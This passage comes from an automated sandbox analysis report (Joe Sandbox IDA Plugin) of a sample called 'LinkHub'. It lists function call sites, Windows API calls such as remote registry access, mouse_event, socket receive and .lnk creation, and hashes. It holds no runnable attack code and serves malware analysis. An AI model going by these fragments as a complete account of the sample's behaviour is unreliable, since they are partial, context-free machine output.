• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandlePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 1424370930-2873401336
                                                                                        • Opcode ID: 4fb7eab6c7ff9c9dbfe10e30f2189842f5110067ebc9cbd9fe5c8632ad51991c
                                                                                        • Instruction ID: 7118d258f49c4186cb834dcbf6edfe21813187d7efad4feb024a2cf9ec12e114
                                                                                        • Opcode Fuzzy Hash: 4fb7eab6c7ff9c9dbfe10e30f2189842f5110067ebc9cbd9fe5c8632ad51991c
                                                                                        • Instruction Fuzzy Hash: 8121B235510306DBDB308F689C45B9E77E8BF55720F208A1AFCA5E32D0DBB098A4EB51
                                                                                        APIs
                                                                                          • Part of subcall function 00207873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002078B1
                                                                                          • Part of subcall function 00207873: GetStockObject.GDI32(00000011), ref: 002078C5
                                                                                          • Part of subcall function 00207873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002078CF
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00294BB0
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00294BBD
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00294BC8
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00294BD7
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00294BE3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        • Opcode ID: 55a750c7d3ff0084f213a95015a9cbeb745450ac08c6792627b3e068941b01b5
                                                                                        • Instruction ID: c8ba090fd91a0152d583c32c292d216b601f77b06416388886a462b6c55429f5
                                                                                        • Opcode Fuzzy Hash: 55a750c7d3ff0084f213a95015a9cbeb745450ac08c6792627b3e068941b01b5
                                                                                        • Instruction Fuzzy Hash: 001186B155021EBEEF119FA5CC85EEB7F5DEF09798F014111B618E6090CA72DC21DBA4
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memcmp
                                                                                        • String ID: j`&
                                                                                        • API String ID: 2931989736-233929150
                                                                                        • Opcode ID: b1eaefa2fbeed25d8a8d8dd5fb4c76896ceec385e5cdf7a7a11cfad45598b455
                                                                                        • Instruction ID: 7d610e67a4e08872a4878adf7ef8d8c78c56716e4c752927aba081220ea28818
                                                                                        • Opcode Fuzzy Hash: b1eaefa2fbeed25d8a8d8dd5fb4c76896ceec385e5cdf7a7a11cfad45598b455
                                                                                        • Instruction Fuzzy Hash: B701B9A16303157B96105A505D86FABB35DAFA239CF004431FD059A241EB71ED70C5A1
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0026E328
                                                                                        • LoadStringW.USER32(00000000), ref: 0026E32F
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0026E345
                                                                                        • LoadStringW.USER32(00000000), ref: 0026E34C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0026E390
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0026E36D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 4072794657-3128320259
                                                                                        • Opcode ID: ce5ca0352cd8b3cbcb3bbe7766ca5334695dc61958119691337ffa43bc8da2ae
                                                                                        • Instruction ID: d50b260b17b58c3798692b0fc6aa5fd80aa512b9e117b55aa1c54df7804b296a
                                                                                        • Opcode Fuzzy Hash: ce5ca0352cd8b3cbcb3bbe7766ca5334695dc61958119691337ffa43bc8da2ae
                                                                                        • Instruction Fuzzy Hash: F501A2F69102087FEB109BA4ED8DEE6377CDB08300F404196B70AE6041E6749E849F70
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00271322
                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 00271334
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 00271342
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00271350
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0027135F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0027136F
                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 00271376
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 8b94038ea6a9089677a087ce66dd0d1620cb678fc7f62893e229a1c790353e8e
                                                                                        • Instruction ID: 314b889cf719c03240aa7bccef60d48569b6aadcd4055730ad0bad2e99f6afc1
                                                                                        • Opcode Fuzzy Hash: 8b94038ea6a9089677a087ce66dd0d1620cb678fc7f62893e229a1c790353e8e
                                                                                        • Instruction Fuzzy Hash: 20F0EC36442612BBD7411F54FE8DBD6BB39FF04306F801162F101918A1C7759871EF90
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0028281D
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0028283E (import by ordinal; WSOCK32 ordinal 17 is recvfrom, consistent with the six arguments and the 0x10-byte sockaddr length)
                                                                                        • WSAGetLastError.WSOCK32 ref: 0028284F
                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 00282938
                                                                                        • inet_ntoa.WSOCK32(?), ref: 002828E9
                                                                                          • Part of subcall function 0026433E: _strlen.LIBCMT ref: 00264348
                                                                                          • Part of subcall function 00283C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0027F669), ref: 00283C9D
                                                                                        • _strlen.LIBCMT ref: 00282992
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3203458085-0
                                                                                        • Opcode ID: d14010af2b975fb5e838a66ce45e6b09a32490c9455d1b83a8123ebf30c5cda4
                                                                                        • Instruction ID: 7e4e007c8294c97a49603c5626a1b2ad11365525e3243c93cb58fc78a8e1d2f0
                                                                                        • Opcode Fuzzy Hash: d14010af2b975fb5e838a66ce45e6b09a32490c9455d1b83a8123ebf30c5cda4
                                                                                        • Instruction Fuzzy Hash: 74B1DF39614301AFD324EF24C885E2AB7A5AF84318F64854CF4564B2E3DB71ED6ACB91
                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 0023042A
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00230446
                                                                                        • __allrem.LIBCMT ref: 0023045D
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0023047B
                                                                                        • __allrem.LIBCMT ref: 00230492
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002304B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1992179935-0
                                                                                        • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                        • Instruction ID: b559b9e8e2ded274fb3085b03cb7af13b2af8e899af514d1b28b990072689252
                                                                                        • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                                                                        • Instruction Fuzzy Hash: 0F811BF2A207069BD724AF69CCD1B6B73B8AF44724F24412AF611D7681E770DE218F64
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00228649,00228649,?,?,?,002367C2,00000001,00000001,8BE85006), ref: 002365CB
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002367C2,00000001,00000001,8BE85006,?,?,?), ref: 00236651
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0023674B
                                                                                        • __freea.LIBCMT ref: 00236758
                                                                                          • Part of subcall function 00233B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        • __freea.LIBCMT ref: 00236761
                                                                                        • __freea.LIBCMT ref: 00236786
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1414292761-0
                                                                                        • Opcode ID: 36f880c2defd9d6e5a4d6ba5a588be5835c3c4be575d91dafcfe82ffe6558739
                                                                                        • Instruction ID: 3ce450d2761229e5b37a211ca484be8d2efa8316985d53c509defe94f7cd3bfe
                                                                                        • Opcode Fuzzy Hash: 36f880c2defd9d6e5a4d6ba5a588be5835c3c4be575d91dafcfe82ffe6558739
                                                                                        • Instruction Fuzzy Hash: C751E5F2630206BBDB258F64CC89EAAB7ADEB40754F548669F914D6140EB74DC60CA60
                                                                                        APIs
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                          • Part of subcall function 0028D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028C10E,?,?), ref: 0028D415
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D451
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4C8
                                                                                          • Part of subcall function 0028D3F8: _wcslen.LIBCMT ref: 0028D4FE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028C72A
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028C785
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0028C7CA
                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0028C7F9
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0028C853
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0028C85F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                        • String ID:
                                                                                        • API String ID: 1120388591-0
                                                                                        • Opcode ID: a7802a9c19cb30253198153658b54dc99de3bf5e36f105ded1adf4ba5b992134
                                                                                        • Instruction ID: 7e3743a226f91383653a8ca88604a1ecb2db71c1d2af7eb089f2a87ad5bd4657
                                                                                        • Opcode Fuzzy Hash: a7802a9c19cb30253198153658b54dc99de3bf5e36f105ded1adf4ba5b992134
                                                                                        • Instruction Fuzzy Hash: BE819C74229341AFC715EF24C885E2ABBE9BF84308F14849CF4594B2A2CB31ED15CFA1
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000035), ref: 002600A9
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00260150
                                                                                        • VariantCopy.OLEAUT32(00260354,00000000), ref: 00260179
                                                                                        • VariantClear.OLEAUT32(00260354), ref: 0026019D
                                                                                        • VariantCopy.OLEAUT32(00260354,00000000), ref: 002601A1
                                                                                        • VariantClear.OLEAUT32(?), ref: 002601AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                        • String ID:
                                                                                        • API String ID: 3859894641-0
                                                                                        • Opcode ID: e77c8a91321deb79a7c604be8fede684fb58e4bb3f6064181f3c1d95bc929b38
                                                                                        • Instruction ID: 0fb4677e00832c96aca44fd28d7dfbcac9df05b294900dfceb3c511063d601f1
                                                                                        • Opcode Fuzzy Hash: e77c8a91321deb79a7c604be8fede684fb58e4bb3f6064181f3c1d95bc929b38
                                                                                        • Instruction Fuzzy Hash: 5151FB75930310E6CF20AF6598D9B2AB3A5EF45310F209447FD06DF296DBB09CA0EB56
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00276F21
                                                                                        • CoInitialize.OLE32(00000000), ref: 0027707E
                                                                                        • CoCreateInstance.OLE32(002A0CC4,00000000,00000001,002A0B34,?), ref: 00277095
                                                                                        • CoUninitialize.OLE32 ref: 00277319
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 886957087-24824748
                                                                                        • Opcode ID: f7bc56428bb6ef63c7e56d9f3da355ee4bebcba7ba32949a6ca640e346541944
                                                                                        • Instruction ID: d78c2bf8184c299b73c2f304661a4346f80ed19d1f5422bcb3b65a081414a142
                                                                                        • Opcode Fuzzy Hash: f7bc56428bb6ef63c7e56d9f3da355ee4bebcba7ba32949a6ca640e346541944
                                                                                        • Instruction Fuzzy Hash: 98D15A71628301AFC310EF24C881E6BB7E8FF99704F40895DF585972A2DB71E955CB92
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0025FBEF,00000000,?,?,00000000,?,002439E2,00000004,00000000,00000000), ref: 00298CA7
                                                                                        • EnableWindow.USER32(?,00000000), ref: 00298CCD
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00298D2C
                                                                                        • ShowWindow.USER32(?,00000004), ref: 00298D40
                                                                                        • EnableWindow.USER32(?,00000001), ref: 00298D66
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00298D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: 65f8f60123a314438c38269c9cbda53da1046ec692605adadc687bb4e6130433
                                                                                        • Instruction ID: 9bf892e06d445ca467eba01157bc3ca9b0464e9c113b714be9bdb791568f044c
                                                                                        • Opcode Fuzzy Hash: 65f8f60123a314438c38269c9cbda53da1046ec692605adadc687bb4e6130433
                                                                                        • Instruction Fuzzy Hash: 09418430602245EFDF29DF24E999BA57BF1FF56304F1C40AAE5085B2A2DB316C59CB60
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00282D45
                                                                                          • Part of subcall function 0027EF33: GetWindowRect.USER32(?,?), ref: 0027EF4B
                                                                                        • GetDesktopWindow.USER32 ref: 00282D6F
                                                                                        • GetWindowRect.USER32(00000000), ref: 00282D76
                                                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00282DB2
                                                                                        • GetCursorPos.USER32(?), ref: 00282DDE
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00282E3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2387181109-0
                                                                                        • Opcode ID: 1defcb21c0be5a4f7c327158997a9e9bf1c92a7f95a58e5d0f5c383a78028842
                                                                                        • Instruction ID: ff12cdf763ad074450c7912f4193ec16356cd6fd9ebf4cc7207128f918b902e0
                                                                                        • Opcode Fuzzy Hash: 1defcb21c0be5a4f7c327158997a9e9bf1c92a7f95a58e5d0f5c383a78028842
                                                                                        • Instruction Fuzzy Hash: 18310276516316ABD720EF14E849F9BBBA9FF84314F00091AF889971C1DB30E918CBD2
                                                                                        APIs
                                                                                        • IsWindowVisible.USER32(?), ref: 002655F9
                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00265616
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0026564E
                                                                                        • _wcslen.LIBCMT ref: 0026566C
                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00265674
                                                                                        • _wcsstr.LIBVCRUNTIME ref: 0026567E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                        • String ID:
                                                                                        • API String ID: 72514467-0
                                                                                        • Opcode ID: 7d498d121ec7f394c9893df412c5ea5a711305e34ef27c3cbd9600032b888271
                                                                                        • Instruction ID: 27458f56a0f179505257e6e3c89a760c28996466a56d48c74dec97420b36770f
                                                                                        • Opcode Fuzzy Hash: 7d498d121ec7f394c9893df412c5ea5a711305e34ef27c3cbd9600032b888271
                                                                                        • Instruction Fuzzy Hash: 4F212632224621BBEB155F68EC49E7B7BACDF45750F14402AF809CA091EBA1DCA1DA60
                                                                                        APIs
                                                                                          • Part of subcall function 00205851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002055D1,?,?,00244B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00205871
                                                                                        • _wcslen.LIBCMT ref: 002762C0
                                                                                        • CoInitialize.OLE32(00000000), ref: 002763DA
                                                                                        • CoCreateInstance.OLE32(002A0CC4,00000000,00000001,002A0B34,?), ref: 002763F3
                                                                                        • CoUninitialize.OLE32 ref: 00276411
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 3172280962-24824748
                                                                                        • Opcode ID: 2b2e133ca70c6041725280ed804727db374711e74e22626b00b02e5c1c517d18
                                                                                        • Instruction ID: e35e0d8987b20d3f89a24e88a8403495d0c01e61a3aa332eb9e47e674996546d
                                                                                        • Opcode Fuzzy Hash: 2b2e133ca70c6041725280ed804727db374711e74e22626b00b02e5c1c517d18
                                                                                        • Instruction Fuzzy Hash: 10D13471A147019FC714DF24C488A2ABBE5EF89714F14899DF8899B3A2CB31EC55CF92
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,002236E9,00223355), ref: 00223700
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0022370E
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00223727
                                                                                        • SetLastError.KERNEL32(00000000,?,002236E9,00223355), ref: 00223779
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
